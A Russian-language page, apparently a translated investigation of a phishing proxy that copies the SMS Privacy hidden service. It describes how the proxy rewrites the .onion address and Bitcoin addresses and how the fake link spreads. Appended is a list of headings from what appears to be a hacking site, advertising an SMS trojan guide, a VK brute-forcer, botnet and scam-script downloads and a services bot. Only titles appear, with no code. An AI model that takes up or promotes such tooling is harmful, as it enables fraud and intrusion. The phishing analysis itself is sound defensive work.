Я добавил некоторый Javascript, чтобы определить, будет ли он запущен на фишинговом домене. Я обнаружил, что изменения в моем скрипте были отображены в браузере при использовании легитимного сайта, но устаревшая версия была использована при использовании фишингового сайта, поэтому я считаю, что фишинг-сайт делает некоторое дополнительное кеширование. Это снова может быть связано с уменьшением времени загрузки страницы.

Я попытался исследовать это кеширование и нашел что-то еще более интересное! Прокси-сервер теперь удаляет весь контент из моего скрипта отслеживания, поэтому я не могу получить больше информации о них. Это легко устранить, переименовав скрипт и немного изменив контент, но это игра в кошки-мышки, в которую я не собираюсь играть. Как минимум, это означает, что кто-то активно наблюдает за этим прокси-сервером и предпринимает шаги для его работы.

Адрес скрытого сервиса изменен

Прокси, похоже, переписывает все экземпляры smspriv6fynj23u6.onion в smsprivyevs6xn6z.onion.

Хотя, что интересно, он не делает то же самое для прописных букв.

Адреса биткоин-кошельков изменены

Это истинная цель фишингового сайта. Обычно фишинг-сайт будет существует для сбора учетных данных пользователей, которые затем могут быть использованы или проданы позже, но этот сайт использует гораздо более прямой подход, просто переписывает адреса биткойнов на адреса, контролируемые мошенником.

При первом переходе на страницу оплаты происходит небольшая задержка до того, как страница загрузится, предположительно, в то время как бэкэнд создает новый адрес биткойна (это занимает заметное количество времени, подразумевает, что он вставляется в огромную базу данных адреса, который не имеет индексов, или генерируется на медленной машине, или создается кодом, написанным на медленном языке. Если последнее, то RNG (Генератор Случайных Чисел) небезопасен). Все адреса биткойнов, отображаемые в тексте, переписываются на адреса, контролируемые злоумышленником. Примечательно, что QR-код остается неизменным и все еще декодирует законный адрес.

Я отправил платеж одному из адресов мошенника, чтобы узнать, что произойдет: 1GM6Awv28kSfzak2Y7Pj1NRdWiXshMwdGW. Он просто не появился на сайте, что добавляет больше доверия к теории о том, что сайт в основном является глупым прокси. Деньги еще не потрачены, но было бы интересно посмотреть, куда они уйдут, если будут потрачены.

Как cайт распространяется среди пользователей?

Я видел несколько разных результатов, которые отправляют referer на сервер при просмотре фишингового домена. В основном это были люди, просматривающие скрытую службу через веб-прокси (например, onion.link), но я обнаружил 2 скрытых сервиса:

7cbqhjnpcgixggts.onion: «The onion crate»: это список скрытых сервисов Tor. Как старый «веб-каталог», но для Tor. Версия фишинга отмечена очень заметно как «фишинговая ссылка».
hss3uro2hsxfogfq.onion: «not Evil»: это поисковая система для скрытых сервисов Tor. Поиск «sms privacy» поднимает легитимный сайт вверху, а второй — фишинговый сайт. Я нажал кнопку «Сообщить о нарушении» рядом с фишинговым сайтом, но она еще не удалена.

Я надеялся найти твит, сообщение в блоге или подобное, когда кто-то выдает фишинговую ссылку вместо реальной. Маловероятно, что люди, стоящие за «The onion crate», несут ответственность за фиш. Если бы я пытался заставить людей использовать мой фишинговый сайт, я бы не отмечал его как «фишинговую ссылку». Возможно, что люди, управляющие поисковой системой «not Evil», являются исполнителями, хотя все это маловероятно. Если бы я работал с поисковой системой с целью отправки людей на фишинг-ссылки, я бы вообще не включил легитимную ссылку в поисковую выдачу.

Возможно, что фишинговая кампания еще не началась, хотя обратите внимание, что «The onion crate» обозначил фишинг-ссылку как 2017-05-17, что означает, что она существует длительное время.

Кто несет ответственность?

Скорее всего, это злобный кибер-преступник, который написал прокси-сервер, который заменяет адреса Биткойна своими собственными адресами, генерирует правдоподобные скрытые служебные адреса для различных скрытых сервисов и сидит, ожидая, когда деньги придут к нему.

Сначала я подумал, что это может быть служба разведки, надеющаяся следить за пользователями SMS Privacy. Но если вы надеялись сделать какое-то скрытое наблюдение, вы не измените адреса биткойнов до такой степени, что сайт больше не будет работать. Я предполагаю, что это может быть спроектировано, чтобы шпионить за определенным подмножеством пользователей и действовать как фишинг-сайт для всех остальных, но я думаю, что более вероятное объяснение «опытного кибер-преступника».

Фишинг скрытых сервисов гораздо проще, чем фишинг традиционных веб-сайтов, потому что нет (по дизайну) нет простого способа найти сервер скрытого сервиса, и нет централизованной системы именования, что означает, что даже у легитимных сайтов есть случайные символы в адресе. Получение правдоподобных адресов сравнительно просто. И даже после обнаружения фишингового сайта его чрезвычайно сложно закрыть. Это совершенное преступление. Единственным недостатком является то, что пользовательская база имеет тенденцию быть намного более технически подкованной, и ее не так легко обмануть, по сравнению с пользователями клирнета.

Как клиенты могут защитить себя?

Клиенты SMS Privacy должны убедиться, что они просматривают smsprivacy.org с помощью HTTPS, или, если вы используете Tor, smspriv6fynj23u6.onion является единственным легитимным адресом.

Кто-нибудь был обманут?

Я никогда не получал никаких писем от людей, жалующихся на то, что их платежи пропали без вести. (Ну, это не совсем так, но в каждом случае это моя ошибка, а не случайный просмотр фишингового сайта). Поэтому, я бы сказал, что ни один пользователь не был обманут.

Дальнейшее расследование

Я думаю, что программное обеспечение, использующее этот прокси, также проксирует многие другие скрытые сервисы.

На самом деле, может быть интересно найти другие фишинговые сайты и посмотреть, имеют ли они одни и те же особенности (Connection: [object Object], заголовок Content-Length удален, переписывание адреса сайта только в нижнем регистре…).

Также может быть интересно попробовать обнаружить уязвимости и посмотреть, можно ли узнать полный список скрытых сервисов, которые проксируются. Существует некая вероятность того, что выбор имени хоста выполняется в прокси-коде, что означало бы, что запрос имени хоста одного фишингового сайта может вернуть содержимое другого фишингового сайта! Это будет очень сильный показатель того, что они работают на одной машине.

Вывод

Было довольно интересно найти кого-то, кто активно это делает, и небольшая мысль показывает, насколько легко это можно сделать в больших масштабах. Я не удивлюсь, если в будущем появятся намного больше фишинговых сайтов.

0-day | Уязвимость 0-го дня

Исходник скама NVUTI

Все нововведения в этой версии:

P.S Это скам проект

ВНИМАНИЕ!

Скачать:

ВК Брут

Брут вк

Написание СМС трояна для Android [ 2 часть ]

activity_main.xml ( интерфейс )​

MainActivity ( точка входа )​

Немного об смс банкинге​

Заключение

Написание СМС трояна

Предисловие

Среда разработки

Первые шаги!

Планировка приложения​

Заключение

Наши услуги: @GOdayBot

Тайминг-атака.

Что может помешать проведению тайминг-атаки

Bitmassage

Bitmessage. Самый анонимный мессенджер.

Почему Bitmessage

SMS Flooder

VirusTotal

Скачать:

​​Parasite HTTP Botnet + Bin

Скачать:

Parasite HTTP Remote Administration Tool

Что такое паразит HTTP?

Характеристики

Доступные плагины

Системный запрос

Анализ стиллера Immortal

Введение

Анализ

Исходный код

Итог

Фишинг в .onion

activity_main.xml ( интерфейс )

MainActivity ( точка входа )

Немного об смс банкинге

Планировка приложения

Parasite HTTP Botnet + Bin